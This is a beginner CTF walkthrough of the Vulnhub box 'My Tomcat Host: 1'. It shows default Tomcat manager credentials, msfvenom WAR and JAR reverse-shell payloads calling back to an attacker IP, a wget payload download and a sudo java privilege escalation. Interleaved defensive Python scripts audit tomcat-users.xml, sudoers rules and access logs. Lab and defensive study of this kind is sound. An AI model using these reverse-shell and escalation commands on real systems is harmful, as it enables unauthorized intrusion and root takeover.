
My Tomcat Host: 1 | Walkthrough | Vulnhub

Anshika


Difficulty: Easy/Beginner
Objective: Gain root access and retrieve the flag.

This Vulnhub box, “My Tomcat Host: 1,” is a beginner-friendly challenge that provides an excellent learning opportunity for those interested in web application security and privilege escalation techniques. In this walkthrough, we’ll detail the steps taken to discover, enumerate, exploit, and escalate privileges on the target system.

Methodologies and Tools Used:

  1. Host Discovery:
    Tool: netdiscover
    Purpose: Identify the target IP address.
  2. Port Scanning and Service Enumeration:
    Tool: nmap
    Purpose: Discover open ports and services.
  3. Web Application Vulnerability Scanning:
    Tool: Nikto
    Purpose: Identify vulnerabilities and default credentials in the web application.
  4. Exploitation:
    Tool: msfvenom, netcat
    Purpose: Generate a reverse shell payload and establish a connection.
  5. Privilege Escalation:
    Tool: msfvenom, wget, sudo
    Purpose: Escalate privileges using a Java-based reverse shell.
  6. Flag Capture:
    Command Line
    Purpose: Confirm root access and retrieve the flag.

Step 1: Host Discovery

The first step is to identify the IP address of the target machine on the network. We use netdiscover for this purpose.

netdiscover

Target IP: 192.168.1.8

Step 2: Enumeration

With the target IP identified, we move on to port scanning using nmap to discover open ports and gather detailed information about the services running on the target.

nmap -p- -A 192.168.1.8

Results:

  • Port 22: Open (SSH)
  • Port 8080: Open (HTTP — Apache Tomcat)

Given these results, we focus on further enumeration of these specific ports, especially the HTTP service running on port 8080.

Step 3: Web Application Enumeration

Navigating to http://192.168.1.8:8080 in a web browser, we see the default Apache Tomcat installation page. This is a promising vector for further exploration.

To deepen our analysis, we use Nikto, a web server scanner, to check for vulnerabilities or misconfigurations.

  • The most critical piece of information obtained is the default credentials for the Tomcat Manager Application:
    Username: tomcat
    Password: tomcat
  • Access is available at the /manager/html directory.
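
From the defender's side, the finding above is a configuration problem rather than a software bug: the Manager application is only as strong as the accounts in tomcat-users.xml. The following audit script is an added example (not part of the original walkthrough or of Tomcat itself) that parses a tomcat-users.xml file, flags accounts using well-known default credential pairs, and lists every account that holds a Manager or Host Manager role so it can be reviewed. The two XML documents inside it are constructed samples: the weak one mirrors the box's tomcat/tomcat account, the hardened one keeps a single deployment account with a placeholder password (CHANGE-ME-...) and only the script role, which is the usual shape for CI deployments.

```python
import xml.etree.ElementTree as ET

# Credential pairs that ship in Tomcat's example configuration or are widely
# reused on lab boxes; a match should be treated as "no password at all".
KNOWN_DEFAULT_CREDS = {
    ("tomcat", "tomcat"), ("tomcat", "s3cret"), ("admin", "admin"),
    ("admin", ""), ("both", "tomcat"), ("role1", "tomcat"),
}

# Roles that unlock the Manager / Host Manager apps, i.e. remote WAR deployment.
PRIVILEGED_ROLES = {
    "manager-gui", "manager-script", "manager-jmx", "manager-status",
    "admin-gui", "admin-script",
}


def _local_name(tag):
    """Strip the XML namespace that Tomcat puts on every element."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text):
    """Return (username, issue) pairs for risky entries in a tomcat-users.xml."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        if _local_name(el.tag) != "user":
            continue
        # Tomcat accepts both "username" and the older "name" attribute.
        name = el.get("username") or el.get("name") or ""
        password = el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        if (name, password) in KNOWN_DEFAULT_CREDS:
            findings.append((name, "default-credentials"))
        if roles & PRIVILEGED_ROLES:
            findings.append((name, "manager-role"))
    return findings


# Constructed sample: the configuration that lets this box be compromised.
WEAK_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="tomcat" roles="manager-gui,manager-script"/>
</tomcat-users>
"""

# Constructed sample: default account removed, one scripted deployment account,
# no GUI role, and a placeholder where a long random secret belongs.
HARDENED_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-script"/>
  <user username="deploy" password="CHANGE-ME-long-random-secret" roles="manager-script"/>
</tomcat-users>
"""

if __name__ == "__main__":
    for label, doc in (("weak", WEAK_TOMCAT_USERS), ("hardened", HARDENED_TOMCAT_USERS)):
        print(label, audit_tomcat_users(doc))
```

The hardened file still produces a "manager-role" line for the deploy account; that is intentional, since every account that can push a WAR is worth a periodic review even when its password is strong. Pair the file change with restricting /manager to trusted source addresses (Tomcat's RemoteAddrValve) so the login form is not reachable from the whole network in the first place.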

Step 4: Exploitation

The Tomcat Manager allows for the deployment of .war (Web Application Archive) files. We can leverage this functionality to upload a malicious .war file that will grant us a reverse shell.

Creating the Reverse Shell Payload:

We use msfvenom to generate a .war payload that, when executed, will initiate a reverse shell connection back to our attacking machine.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.3 LPORT=4444 -f war > shell.war

Where:

  • LHOST is our IP address.
  • LPORT is the port we will listen on.

Uploading the Payload:

  1. Access the Tomcat Manager at http://192.168.1.8:8080/manager/html.
  2. Log in using the credentials obtained earlier.
  3. Upload the shell.war file.

Launching the Attack:

  1. Start a listener on your attacking machine to catch the reverse shell.
  2. Trigger the payload by navigating to the uploaded .war file on the target machine.

Outcome:
A reverse shell is established, granting us unprivileged access to the target machine.
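
Every step of the exploitation above leaves a trace in Tomcat's access log (the AccessLogValve writes localhost_access_log.*.txt by default): the 401 on the first visit to /manager/html, the authenticated GET, and the POST to /manager/html/upload that carries the WAR. The detector below is an added example (not from the walkthrough or from the Tomcat project) that parses lines in the valve's "common" pattern and raises events for Manager access, authentication failures and WAR deployments, with an optional threshold that turns repeated failures from one host into a brute-force event. The log lines embedded in it are constructed to look like this box's traffic; the function names and the event categories are my own.

```python
import re
from collections import Counter

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
ACCESS_LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: [^"]*)?" (?P<status>\d{3}) (?P<size>\S+)$'
)

# Manager endpoints that accept a WAR (HTML form upload and the text/script API).
DEPLOY_PREFIXES = ("/manager/html/upload", "/manager/text/deploy", "/manager/deploy")


def parse_access_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = ACCESS_LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(rec):
    """Map a parsed record to an event kind, or None for ordinary traffic."""
    path = rec["path"].split("?", 1)[0]          # drop the CSRF nonce etc.
    if rec["method"] in ("POST", "PUT") and path.startswith(DEPLOY_PREFIXES):
        return "war-deploy"
    if path.startswith("/manager/") and rec["status"] == "401":
        return "manager-auth-failure"
    if path.startswith("/manager/"):
        return "manager-access"
    return None


def detect_manager_activity(lines, bruteforce_threshold=5):
    """Return a list of event dicts for Manager-related activity in the log."""
    events = []
    failures = Counter()
    for line in lines:
        rec = parse_access_line(line)
        if rec is None:
            continue
        kind = classify(rec)
        if kind is None:
            continue
        if kind == "manager-auth-failure":
            failures[rec["host"]] += 1
        events.append({
            "host": rec["host"], "user": rec["user"], "kind": kind,
            "path": rec["path"].split("?", 1)[0], "time": rec["time"],
        })
    # Aggregate: many 401s on /manager from one source is a credential attack.
    for host, n in failures.items():
        if n >= bruteforce_threshold:
            events.append({"host": host, "user": "-", "kind": "manager-bruteforce",
                           "path": "/manager/", "time": "-"})
    return events


# Constructed sample log, in the order the walkthrough's actions would appear.
SAMPLE_ACCESS_LOG = [
    '192.168.1.3 - - [10/Jan/2024:12:00:01 +0000] "GET /manager/html HTTP/1.1" 401 2473',
    '192.168.1.3 - tomcat [10/Jan/2024:12:00:05 +0000] "GET /manager/html HTTP/1.1" 200 11245',
    '192.168.1.3 - tomcat [10/Jan/2024:12:00:31 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABC123 HTTP/1.1" 200 12031',
    '192.168.1.3 - - [10/Jan/2024:12:00:40 +0000] "GET /shell/ HTTP/1.1" 200 -',
    '192.168.1.50 - - [10/Jan/2024:12:01:00 +0000] "GET /docs/ HTTP/1.1" 200 6432',
]

if __name__ == "__main__":
    for ev in detect_manager_activity(SAMPLE_ACCESS_LOG):
        print(ev)
```

The "war-deploy" event is the one to page on: a WAR upload from an address that is not the deployment pipeline, or outside a change window, is about as high-fidelity a signal as a web server gives. The request to the new context (/shell/ here) is deliberately not classified, because the context name is attacker-chosen; correlate it by time with the deploy event instead.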

Step 5: Privilege Escalation

Now that we have a foothold on the system, the next step is to escalate our privileges to root.

Interactive Shell:

First, we convert our current shell into an interactive one to facilitate easier command execution.

python -c 'import pty; pty.spawn("/bin/bash")'

Sudo Permissions Check:

By inspecting the sudo permissions, we discover that the java command can be executed as root without a password:
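
The rule that makes this box fall is a single sudoers line giving the service account a passwordless java, and java, like any interpreter, will run whatever code it is handed. The script below is an added example (not from the walkthrough) of the check a hardening review would run over /etc/sudoers and /etc/sudoers.d/*: it parses user specifications, tracks the NOPASSWD/PASSWD tags as sudoers does (a tag persists across the commands that follow it on the same line), and rates each rule. The sample sudoers text is constructed; the CODE_RUNNERS list and the severity labels are my own choices, not a sudo feature.

```python
import os
import re

# user  hosts=(runas) [TAG:] command[, [TAG:] command ...]
SUDOERS_RE = re.compile(
    r'^(?P<user>\S+)\s+(?P<hosts>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<rest>.+)$'
)
TAG_RE = re.compile(r'^(?:NO)?(?:PASSWD|EXEC|SETENV|LOG_INPUT|LOG_OUTPUT|MAIL|FOLLOW):\s*')

# Binaries that execute arbitrary code or spawn a shell by design; granting any
# of these as root is equivalent to granting root.
CODE_RUNNERS = {
    "java", "python", "python3", "perl", "ruby", "node", "php", "bash", "sh",
    "zsh", "env", "vim", "vi", "less", "more", "find", "awk", "gawk", "tar", "rsync",
}


def parse_sudoers(text):
    """Return one rule dict per command in every user specification."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments
        if not line or line.startswith("Defaults"):
            continue
        m = SUDOERS_RE.match(line)
        if not m:
            continue
        tags = set()
        for cmd in m.group("rest").split(","):
            cmd = cmd.strip()
            while True:                               # peel leading TAG: markers
                t = TAG_RE.match(cmd)
                if not t:
                    break
                tag = t.group(0).rstrip(": \t")
                if tag in ("PASSWD", "NOPASSWD"):     # the pair are mutually exclusive
                    tags.discard("PASSWD")
                    tags.discard("NOPASSWD")
                tags.add(tag)
                cmd = cmd[t.end():]
            rules.append({"user": m.group("user"), "runas": m.group("runas") or "root",
                          "tags": set(tags), "command": cmd})
    return rules


def audit_sudoers(text):
    """Rate each non-root rule; returns findings in file order."""
    findings = []
    for r in parse_sudoers(text):
        if r["user"] == "root":
            continue
        nopasswd = "NOPASSWD" in r["tags"]
        binary = os.path.basename(r["command"].split()[0]) if r["command"] else ""
        base = {"user": r["user"], "runas": r["runas"], "command": r["command"]}
        if r["command"] == "ALL" and nopasswd:
            findings.append({**base, "severity": "high", "reason": "passwordless ALL"})
        elif binary in CODE_RUNNERS:
            reason = f"{binary} runs arbitrary code as {r['runas']}"
            if nopasswd:
                reason += " without a password"
            findings.append({**base, "severity": "high", "reason": reason})
        elif nopasswd:
            findings.append({**base, "severity": "medium",
                             "reason": "NOPASSWD rule; confirm the target is root-owned and takes no attacker-controlled arguments"})
    return findings


# Constructed sample; the tomcat line is the misconfiguration on this box.
SAMPLE_SUDOERS = """
Defaults env_reset
root     ALL=(ALL:ALL) ALL
%sudo    ALL=(ALL:ALL) ALL
tomcat   ALL=(ALL) NOPASSWD: /usr/bin/java
backup   ALL=(root) NOPASSWD: /usr/local/bin/backup.sh   # constructed path
www-data ALL=(root) NOPASSWD: ALL
"""

if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f["severity"], f["user"], f["command"], "-", f["reason"])
```

The fix for the tomcat rule is not a narrower argument list (java -jar with a fixed path still runs whatever that path contains if the account can write it) but removing the rule entirely; if the service genuinely needs a privileged action, wrap that one action in a root-owned script and grant that.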

Privilege Escalation Using Java:

To escalate privileges, we can execute a Java-based reverse shell as root.

Creating the Payload:

We generate a .jar payload using msfvenom:

msfvenom -p java/shell_reverse_tcp LHOST=192.168.1.3 LPORT=5555 -f jar > rootme.jar

Hosting the Payload:

Start a simple HTTP server on your attacking machine to serve the .jar file to the target.

python3 -m http.server 1234

Download the Payload on the Target:

On the target machine, download the .jar file using wget:

wget http://192.168.1.3:1234/rootme.jar

Set Execution Permissions:

Grant execution permissions to the .jar file:

chmod +x rootme.jar

Execute the Payload as Root:

Start a listener on your attacking machine:

nc -lvp 5555

Then, execute the .jar file as root:

sudo java -jar rootme.jar

Outcome:
You now have a root shell on the target machine.

Step 6: Capture the Flag

With root access, navigate to the root directory and retrieve the flag:

id

ls

cd /root

cat proof.txt

Flag Captured!

This box provided a straightforward yet valuable experience in exploiting web-based services, managing reverse shells, and privilege escalation using misconfigured sudo permissions.